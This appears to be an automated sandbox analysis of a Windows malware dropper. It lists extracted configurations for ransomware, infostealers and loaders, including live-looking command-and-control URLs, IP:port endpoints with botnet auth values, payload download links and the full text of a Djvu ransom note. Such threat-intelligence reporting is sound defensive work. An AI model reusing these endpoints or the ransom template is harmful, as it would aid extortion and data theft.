djvu | d15633c9bbd323cdf03a4bd4137efc455735af35bb06f923f138e3ef7225fab4

Analysis

max time kernel
91s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
14-03-2022 04:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d15633c9bbd323cdf03a4bd4137efc455735af35bb06f923f138e3ef7225fab4.exe
Size

7.7MB
MD5

2336a562dacf2c903f4965eddb2f94a9
SHA1

248e68fe35ea9a40fc27410929b989b70e03ec91
SHA256

d15633c9bbd323cdf03a4bd4137efc455735af35bb06f923f138e3ef7225fab4
SHA512

439fa39f938decbe6bee4b197e992cd328c2dae1f163b969ee533c17651b1e4f31619c7dc99d4895343b12f9760884a709820fd5a4fa4f87e8953d71df4c9a6d

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32

Extracted

Family

vidar

Version

50.7

Botnet

937

https://ruhr.social/@sam9al

https://koyu.space/@samsa2l

Attributes

profile_id
937

Extracted

Family

redline

Botnet

ruzki12_03

176.122.23.55:11768

Attributes

auth_value
c51ddc8008e8581a01cec6e8291c5530

Extracted

Family

djvu

http://fuyt.org/test3/get.php

Attributes

extension
.xcbg
offline_id
y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1
payload_url
http://zerit.top/dl/build2.exe
http://fuyt.org/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn

rsa_pubkey.plain

Extracted

Family

redline

Botnet

@ywqmre

185.215.113.24:15994

Attributes

auth_value
5a482aa0be2b5e01649fe7a3ce943422

Extracted

Family

redline

Botnet

ruz876

185.215.113.7:5186

Attributes

auth_value
4750f6742a496bbe74a981d51e7680ad

Extracted

Family

redline

Botnet

Installs

94.23.1.92:12857

Attributes

auth_value
c8e146507a5c0004dfcc77a7c5f15bc2

Extracted

Family

redline

Botnet

pizzadlyashekera

65.108.101.231:14648

Attributes

auth_value
7d6b3cb15fc835e113d8c22bd7cfe2b4

Signatures

Detected Djvu ransomware 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4368-282-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/4368-285-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/4368-290-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/4368-294-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1708-168-0x0000000002EA0000-0x00000000037C7000-memory.dmp	family_glupteba
behavioral2/memory/1708-172-0x0000000000400000-0x0000000002584000-memory.dmp	family_glupteba
behavioral2/memory/2308-176-0x0000000000400000-0x0000000002584000-memory.dmp	family_glupteba
behavioral2/memory/1028-188-0x0000000000400000-0x0000000002584000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 9 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2244-236-0x0000000000BE0000-0x0000000000D94000-memory.dmp	family_redline
behavioral2/memory/2244-234-0x0000000000BE0000-0x0000000000D94000-memory.dmp	family_redline
behavioral2/memory/2244-240-0x0000000000BE0000-0x0000000000D94000-memory.dmp	family_redline
behavioral2/memory/2244-242-0x0000000000BE0000-0x0000000000D94000-memory.dmp	family_redline
behavioral2/memory/1544-275-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/4776-306-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/1148-298-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/4700-295-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/1784-274-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

svchost.exe

description pid process target process

PID 4832 created 1708 4832 svchost.exe Graphics.exe
PID 4832 created 1028 4832 svchost.exe csrss.exe
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

description	pid	process	target process
PID 4832 created 1708	4832	svchost.exe	Graphics.exe
PID 4832 created 1028	4832	svchost.exe	csrss.exe

OnlyLogger Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/220-264-0x0000000000400000-0x000000000048C000-memory.dmp	family_onlylogger
behavioral2/memory/220-263-0x00000000020D0000-0x0000000002114000-memory.dmp	family_onlylogger

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/2376-267-0x0000000000400000-0x00000000004CE000-memory.dmp	family_vidar
behavioral2/memory/2376-268-0x00000000020D0000-0x000000000217C000-memory.dmp	family_vidar

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 37 IoCs

Processes:

SoCleanInst.exemd9_1sjm.exeFolder.exeGraphics.exeUpdbdate.exeInstall.exeFiles.exepub2.exeFile.exejfiag3g_gg.exejfiag3g_gg.exeGraphics.execsrss.exeinjector.exe5Pa6xL7OY2SJotggkqxVCL6D.exe2k0jZyWme9GDpIPjvWDInG3u.exekvXZVpfZ9LIxh3osku_qtWIw.exeZl24LnHuyGBD5OWSbFFM4try.exeswtJPkoVDerZPYqhlGPwumOz.exeCm7hMi4z6J7v5BvaID5_0cGP.exeEDjhTb1aBZ9BG5g3zumpvALo.exe4CstJgsoYTy2Cc4CN12NOQ1e.exelF_BTdudT4N1fD228SRrnz8Z.exeCv2yiwZ0DoAfFpoEBg9RejWc.exefHuYJ85vvIxMcwCJyqcaeeZo.exeXATgDymb5qZqzyRLDWsDSHhN.exeZERYQhznAc32wXq6KBsRAz1a.exevarpFOxgffuKEQr5qL51JxW9.exebs9JP9UkWEMiMXNn8Ws60fL7.exebXh1QKu8V1zCYtGKLXVTIuTD.exei0HjeC3T2g2fWv95jSegoMp3.exeJ9fO8GZKZyLAaQ3kvYdX7keV.exeRkC4INfT6KZTn6DHkfTo_WSM.exe78k5pX_tqqrrSO72nueBmlrY.exeInstall.exeeed24e0f-3d49-40a5-ac89-abd3ec3ff461.exeCm7hMi4z6J7v5BvaID5_0cGP.exe

pid	process
3472	SoCleanInst.exe
1964	md9_1sjm.exe
4260	Folder.exe
1708	Graphics.exe
1284	Updbdate.exe
3600	Install.exe
3940	Files.exe
5064	pub2.exe
1352	File.exe
2248	jfiag3g_gg.exe
2760	jfiag3g_gg.exe
2308	Graphics.exe
1028	csrss.exe
1448	injector.exe
4836	5Pa6xL7OY2SJotggkqxVCL6D.exe
2584	2k0jZyWme9GDpIPjvWDInG3u.exe
2376	kvXZVpfZ9LIxh3osku_qtWIw.exe
220	Zl24LnHuyGBD5OWSbFFM4try.exe
3340	swtJPkoVDerZPYqhlGPwumOz.exe
2164	Cm7hMi4z6J7v5BvaID5_0cGP.exe
2524	EDjhTb1aBZ9BG5g3zumpvALo.exe
3172	4CstJgsoYTy2Cc4CN12NOQ1e.exe
3696	lF_BTdudT4N1fD228SRrnz8Z.exe
4404	Cv2yiwZ0DoAfFpoEBg9RejWc.exe
3120	fHuYJ85vvIxMcwCJyqcaeeZo.exe
2244	XATgDymb5qZqzyRLDWsDSHhN.exe
5068	ZERYQhznAc32wXq6KBsRAz1a.exe
3328	varpFOxgffuKEQr5qL51JxW9.exe
3476	bs9JP9UkWEMiMXNn8Ws60fL7.exe
2008	bXh1QKu8V1zCYtGKLXVTIuTD.exe
4440	i0HjeC3T2g2fWv95jSegoMp3.exe
4448	J9fO8GZKZyLAaQ3kvYdX7keV.exe
3096	RkC4INfT6KZTn6DHkfTo_WSM.exe
2476	78k5pX_tqqrrSO72nueBmlrY.exe
500	Install.exe
2276	eed24e0f-3d49-40a5-ac89-abd3ec3ff461.exe
4368	Cm7hMi4z6J7v5BvaID5_0cGP.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\Pictures\Adobe Films\EDjhTb1aBZ9BG5g3zumpvALo.exe	upx
C:\Users\Admin\Pictures\Adobe Films\EDjhTb1aBZ9BG5g3zumpvALo.exe	upx

Checks BIOS information in registry 2 TTPs 10 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

J9fO8GZKZyLAaQ3kvYdX7keV.exebXh1QKu8V1zCYtGKLXVTIuTD.exebs9JP9UkWEMiMXNn8Ws60fL7.exei0HjeC3T2g2fWv95jSegoMp3.exeRkC4INfT6KZTn6DHkfTo_WSM.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	J9fO8GZKZyLAaQ3kvYdX7keV.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	bXh1QKu8V1zCYtGKLXVTIuTD.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	bs9JP9UkWEMiMXNn8Ws60fL7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	i0HjeC3T2g2fWv95jSegoMp3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	i0HjeC3T2g2fWv95jSegoMp3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	RkC4INfT6KZTn6DHkfTo_WSM.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	J9fO8GZKZyLAaQ3kvYdX7keV.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	bXh1QKu8V1zCYtGKLXVTIuTD.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	bs9JP9UkWEMiMXNn8Ws60fL7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	RkC4INfT6KZTn6DHkfTo_WSM.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

File.exelF_BTdudT4N1fD228SRrnz8Z.exeswtJPkoVDerZPYqhlGPwumOz.exefHuYJ85vvIxMcwCJyqcaeeZo.exed15633c9bbd323cdf03a4bd4137efc455735af35bb06f923f138e3ef7225fab4.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	File.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	lF_BTdudT4N1fD228SRrnz8Z.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	swtJPkoVDerZPYqhlGPwumOz.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	fHuYJ85vvIxMcwCJyqcaeeZo.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	d15633c9bbd323cdf03a4bd4137efc455735af35bb06f923f138e3ef7225fab4.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Files.exeGraphics.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex"	Files.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OldDawn = "\"C:\\Windows\\rss\\csrss.exe\""	Graphics.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 6 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

J9fO8GZKZyLAaQ3kvYdX7keV.exebXh1QKu8V1zCYtGKLXVTIuTD.exebs9JP9UkWEMiMXNn8Ws60fL7.exei0HjeC3T2g2fWv95jSegoMp3.exeRkC4INfT6KZTn6DHkfTo_WSM.exemd9_1sjm.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	J9fO8GZKZyLAaQ3kvYdX7keV.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	bXh1QKu8V1zCYtGKLXVTIuTD.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	bs9JP9UkWEMiMXNn8Ws60fL7.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	i0HjeC3T2g2fWv95jSegoMp3.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RkC4INfT6KZTn6DHkfTo_WSM.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md9_1sjm.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

262 ipinfo.io
13 ip-api.com
115 ipinfo.io
116 ipinfo.io
226 ipinfo.io
227 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

XATgDymb5qZqzyRLDWsDSHhN.exe

pid process

2244 XATgDymb5qZqzyRLDWsDSHhN.exe

flow	ioc
262	ipinfo.io
13	ip-api.com
115	ipinfo.io
116	ipinfo.io
226	ipinfo.io
227	ipinfo.io

pid	process
2244	XATgDymb5qZqzyRLDWsDSHhN.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

Cm7hMi4z6J7v5BvaID5_0cGP.exeJ9fO8GZKZyLAaQ3kvYdX7keV.exebs9JP9UkWEMiMXNn8Ws60fL7.exei0HjeC3T2g2fWv95jSegoMp3.exebXh1QKu8V1zCYtGKLXVTIuTD.exeRkC4INfT6KZTn6DHkfTo_WSM.exe

description	pid	process	target process
PID 2164 set thread context of 4368	2164	Cm7hMi4z6J7v5BvaID5_0cGP.exe	Cm7hMi4z6J7v5BvaID5_0cGP.exe
PID 4448 set thread context of 1784	4448	J9fO8GZKZyLAaQ3kvYdX7keV.exe	AppLaunch.exe
PID 3476 set thread context of 1544	3476	bs9JP9UkWEMiMXNn8Ws60fL7.exe	AppLaunch.exe
PID 4440 set thread context of 1148	4440	i0HjeC3T2g2fWv95jSegoMp3.exe	AppLaunch.exe
PID 2008 set thread context of 4700	2008	bXh1QKu8V1zCYtGKLXVTIuTD.exe	AppLaunch.exe
PID 3096 set thread context of 4776	3096	RkC4INfT6KZTn6DHkfTo_WSM.exe	AppLaunch.exe

Drops file in Program Files directory 2 IoCs

Processes:

2k0jZyWme9GDpIPjvWDInG3u.exe

description	ioc	process
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	2k0jZyWme9GDpIPjvWDInG3u.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	2k0jZyWme9GDpIPjvWDInG3u.exe

Drops file in Windows directory 2 IoCs

Processes:

Graphics.exe

description ioc process

File opened for modification C:\Windows\rss Graphics.exe
File created C:\Windows\rss\csrss.exe Graphics.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File opened for modification	C:\Windows\rss	Graphics.exe
File created	C:\Windows\rss\csrss.exe	Graphics.exe

Program crash 64 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3084	1708	WerFault.exe	Graphics.exe
3572	1708	WerFault.exe	Graphics.exe
3624	1708	WerFault.exe	Graphics.exe
4572	1708	WerFault.exe	Graphics.exe
5092	1708	WerFault.exe	Graphics.exe
3320	1708	WerFault.exe	Graphics.exe
3884	1708	WerFault.exe	Graphics.exe
3364	1708	WerFault.exe	Graphics.exe
3800	1708	WerFault.exe	Graphics.exe
1116	1708	WerFault.exe	Graphics.exe
4372	1708	WerFault.exe	Graphics.exe
3404	1708	WerFault.exe	Graphics.exe
1328	1708	WerFault.exe	Graphics.exe
3908	1708	WerFault.exe	Graphics.exe
2836	1708	WerFault.exe	Graphics.exe
5052	1708	WerFault.exe	Graphics.exe
3472	1708	WerFault.exe	Graphics.exe
2692	1708	WerFault.exe	Graphics.exe
5076	1708	WerFault.exe	Graphics.exe
3084	1708	WerFault.exe	Graphics.exe
4964	1708	WerFault.exe	Graphics.exe
2460	2308	WerFault.exe	Graphics.exe
2872	2308	WerFault.exe	Graphics.exe
2784	2308	WerFault.exe	Graphics.exe
1292	2308	WerFault.exe	Graphics.exe
4320	2308	WerFault.exe	Graphics.exe
3208	2308	WerFault.exe	Graphics.exe
4148	2308	WerFault.exe	Graphics.exe
1220	2308	WerFault.exe	Graphics.exe
3432	2308	WerFault.exe	Graphics.exe
3268	2308	WerFault.exe	Graphics.exe
3708	2308	WerFault.exe	Graphics.exe
5004	2308	WerFault.exe	Graphics.exe
4988	2308	WerFault.exe	Graphics.exe
3144	2308	WerFault.exe	Graphics.exe
2424	2308	WerFault.exe	Graphics.exe
3216	2308	WerFault.exe	Graphics.exe
100	1028	WerFault.exe	csrss.exe
3112	1028	WerFault.exe	csrss.exe
4628	1028	WerFault.exe	csrss.exe
4964	1028	WerFault.exe	csrss.exe
332	1028	WerFault.exe	csrss.exe
1344	1028	WerFault.exe	csrss.exe
4740	1028	WerFault.exe	csrss.exe
1756	1028	WerFault.exe	csrss.exe
1216	1028	WerFault.exe	csrss.exe
4320	1028	WerFault.exe	csrss.exe
1600	1028	WerFault.exe	csrss.exe
368	1028	WerFault.exe	csrss.exe
4188	1028	WerFault.exe	csrss.exe
204	1028	WerFault.exe	csrss.exe
2100	1028	WerFault.exe	csrss.exe
3668	1028	WerFault.exe	csrss.exe
4124	1028	WerFault.exe	csrss.exe
1108	1028	WerFault.exe	csrss.exe
896	1028	WerFault.exe	csrss.exe
4092	1028	WerFault.exe	csrss.exe
1796	1028	WerFault.exe	csrss.exe
712	1028	WerFault.exe	csrss.exe
3096	1028	WerFault.exe	csrss.exe
2784	1028	WerFault.exe	csrss.exe
3724	1028	WerFault.exe	csrss.exe
4912	5068	WerFault.exe
4756	220	WerFault.exe	WerFault.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

pub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4216 schtasks.exe
2056 schtasks.exe
3164 schtasks.exe
3964 schtasks.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

4960 timeout.exe
2640 timeout.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

4384 tasklist.exe
3284 tasklist.exe
Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

4324 taskkill.exe
3620 taskkill.exe
4576 taskkill.exe

pid	process
4216	schtasks.exe
2056	schtasks.exe
3164	schtasks.exe
3964	schtasks.exe

pid	process
4960	timeout.exe
2640	timeout.exe

pid	process
4384	tasklist.exe
3284	tasklist.exe

pid	process
4324	taskkill.exe
3620	taskkill.exe
4576	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

Graphics.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2891 = "Sudan Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2592 = "Tocantins Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"	Graphics.exe
